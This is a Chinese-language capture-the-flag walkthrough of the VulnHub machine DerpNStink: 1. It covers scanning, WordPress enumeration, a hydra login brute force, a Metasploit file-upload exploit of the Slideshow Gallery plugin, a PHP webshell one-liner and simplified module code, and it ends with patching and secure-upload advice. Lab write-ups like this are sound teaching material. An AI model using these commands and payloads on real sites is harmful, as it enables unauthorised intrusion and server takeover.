DerpNStink: 1

来自 < DerpNStink: 1 ~ VulnHub>

1，将两台虚拟机网络连接都改为NAT模式

2，攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182，靶场IP192.168.23.213

3，对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.213

4，首先访问80端口的web服务

查看页面源代码得到第一个flag

view-source:192.168.23.213

5，只是一个静态页面，那么接下来就需要枚举爆破其子目录

dirsearch -u http://192.168.23.213 -x 403,404

http://192.168.23.213/robots.txt

http://192.168.23.213/temporary/

6，网站的后端代码应该是PHP，数据库是mysql

dirsearch -u http://192.168.23.213/php -x 403,404

dirb http://192.168.23.213

/weblog下有东西，网站的CMS采用的是wordpress

使用whatweb扫描的之后正提示我们需要使用指定域名访问网站。浏览器的回显也可以证明

修改/etc/hosts即可

此时能够成功访问

7，然后再去扫描这个网站的子目录

dirsearch -u http://derpnstink.local/weblog/ -x 403,404

然后再使用wpscan进行框架漏洞扫描

wpscan --url http://derpnstink.local/weblog/

1. 任意文件上传漏洞 (CVE-2014-5460)

影响版本: < 1.4.7
风险等级: 🔴 严重
攻击向量: 未授权攻击者可上传恶意文件（如PHP webshell）。
修复建议 :
- 立即升级至 1.4.7+
- 禁用插件直至升级完成。
- 检查wp-content/uploads/slideshow-gallery目录下是否有可疑文件。

2. 跨站脚本（XSS）与文件上传漏洞

影响版本: Tribulant Slideshow Gallery < 1.5.3.4
风险等级: 🔴 严重
攻击向量: 结合XSS和文件上传实现远程代码执行。
修复建议 :
- 升级至 1.5.3.4+
- 审核所有用户输入字段（如标题、描述）的输入过滤逻辑。

3. 已认证XSS漏洞

影响版本: <= 1.6.4
风险等级: 🟠 高危
攻击向量: 需低权限用户（如订阅者）触发XSS。
修复建议 :
- 升级至 1.6.5+
- 实施严格的Content-Security-Policy头。

4. 多重已认证XSS (CVE-2018-17946)

影响版本: <= 1.6.5
风险等级: 🟠 高危
攻击向量: 管理员界面注入恶意脚本。
修复建议 :
- 升级至 1.6.6+
- 对所有输出内容进行HTML编码（如使用esc_html()）。

5. XSS与SQL注入漏洞 (CVE-2018-18017~18019)

影响版本: <= 1.6.8
风险等级: 🔴 严重
攻击向量: 通过参数污染实现数据库拖取或提权。
修复建议 :
- 升级至 1.6.9+
- 使用WAF拦截恶意SQL语句（如UNION SELECT）。

6. 管理员存储型XSS (CVE-2021-24882)

影响版本: < 1.7.4
风险等级: 🟠 高危
攻击向量: 管理员账户劫持。
修复建议 :
- 升级至 1.7.4+
- 限制管理员编辑器的JavaScript执行权限。

7. 未授权敏感信息泄露 (CVE-2024-31353)

影响版本: < 1.8.1
风险等级: 🟠 高危
攻击向量: 暴露数据库凭据或API密钥。
修复建议 :
- 升级至 1.8.1+
- 检查.env或wp-config.php是否被公开访问。

8. CSRF导致设置重置 (CVE-2024-31354)

影响版本: < 1.7.9
风险等级: 🟡 中危
攻击向量: 诱骗管理员点击恶意链接。
修复建议 :
- 升级至 1.7.9+
- 添加反CSRF令牌至所有表单。

9. 贡献者权限SQL注入 (CVE-2024-31355)

影响版本: < 1.7.9
风险等级: 🔴 严重
攻击向量: 低权限用户执行任意SQL查询。
修复建议 :
- 升级至 1.7.9+
- 使用$wpdb->prepare()预处理所有SQL语句。

10. 已认证SQL注入 (CVE-2024-5543)

影响版本: LITE < 1.8.2
风险等级: 🔴 严重
攻击向量: 通过参数注入提取用户数据。
修复建议 :
- 升级至 1.8.2+
- 启用数据库审计日志监控异常查询。

11. 管理员存储型XSS (CVE-2024-47376)

影响版本: < 1.8.4
风险等级: 🟠 高危
攻击向量: 劫持管理员会话。
修复建议 :
- 升级至 1.8.4+
- 启用浏览器XSS过滤器（如X-XSS-Protection头）。

8，弱口令爆破出网站的登陆密码为admin/admin

hydra -l admin -P /usr/share/wordlists/rockyou.txt -vV derpnstink.local- http-post-form "/weblog/wp-login.php:log=^USER^&pwd=^PASS^:error"

9，登录成功

利用刚才wpscan扫出来Slideshow Gallery存在的漏洞。因为我们知道后台的账户密码，这里使用msf来进行getshell操作

msfconsole

search slideshow

use 4

show options

set rhosts 192.168.23.213

set targeturi /weblog/

set wp_user admin

set wp_password admin

run

最后成功getshell

Metasploit模块分析：exploit/unix/webapp/wp_slideshowgallery_upload

1. 模块功能概述

漏洞类型 : WordPress插件Slideshow Gallery的认证文件上传漏洞（CVE-2014-5460）。
攻击目标: 允许已登录用户上传恶意PHP文件至服务器，执行任意代码。
利用条件 :
- WordPress安装Slideshow Gallery插件且版本<1.4.7。
- 攻击者需拥有有效用户凭证（至少作者/贡献者权限）。
Payload: 通常为反向Shell或Webshell，用于获取服务器控制权。

2. 漏洞技术原理

漏洞点 : 插件的文件上传功能未对文件类型、内容做严格校验。
- 错误实现: 仅依赖客户端MIME类型检查（如image/jpeg），未在服务端验证文件内容。
- 恶意绕过: 将PHP文件伪装成图片（如shell.php.jpg），利用插件解析漏洞触发代码执行。
关键代码路径 :
// 伪代码示例：插件上传处理逻辑

|--------------------------------------------------------------------------------------------------------------------------------------|
| if ( $_FILES\['file'\]\['type'\] == 'image/jpeg') { move_uploaded_file($ _FILES['file']['tmp_name'], $target_path); // 未校验实际文件内容 } |

3. 模块工作流程

认证阶段 :
- 使用提供的用户名密码登录WordPress后台，获取wp-admin的Cookies。
- 发送POST请求至/wp-login.php，维持会话状态。
漏洞利用 :
- 构造multipart/form-data请求，向插件上传接口（如/wp-admin/admin-ajax.php）发送恶意文件。
- 使用随机文件名绕过黑名单过滤（如rNd0m.php）。
- 植入Payload（如<?php system($_GET['cmd']); ?>）。
触发执行 :
- 访问上传的恶意文件路径（如/wp-content/uploads/slideshow-gallery/rNd0m.php）。
- 通过GET/POST参数传递命令，实现远程代码执行（RCE）。

4. 模块关键代码解析（简化版）

|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| # Metasploit模块核心代码逻辑 def exploit # 1. 登录WordPress res = send_request_cgi({ 'method' => 'POST', 'uri' => wordpress_url_login, 'vars_post' => { 'log' => datastore['USERNAME'], 'pwd' => datastore['PASSWORD'] } }) # 2. 上传恶意PHP文件 payload_name = "#{rand_text_alpha(5)}.php" post_data = Rex::MIME::Message.new post_data.add_part('upload', nil, nil, 'form-data; name="action"') post_data.add_part(payload.encoded, 'application/x-php', 'binary', "form-data; name=\"file\"; filename=\"#{payload_name}\"") send_request_cgi({ 'method' => 'POST', 'uri' => wordpress_url_admin_ajax, 'cookie' => cookies, 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) # 3. 触发Payload send_request_cgi({ 'uri' => "#{upload_path}/#{payload_name}", 'method' => 'GET' }) end |

5. 防御与检测建议

修复措施 :
- 升级插件至1.4.7+，修复文件类型验证逻辑。
- 在服务器端使用finfo_file()检测文件真实类型，而非依赖客户端提交的MIME。
安全加固:

|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| // 安全文件上传示例代码 $file_info = new finfo(FILEINFO_MIME_TYPE);$ mime_type = $file_info-\>file($ _FILES['file']['tmp_name']); if (!in_array($mime_type, ['image/jpeg', 'image/png'])) { die("Invalid file type."); } |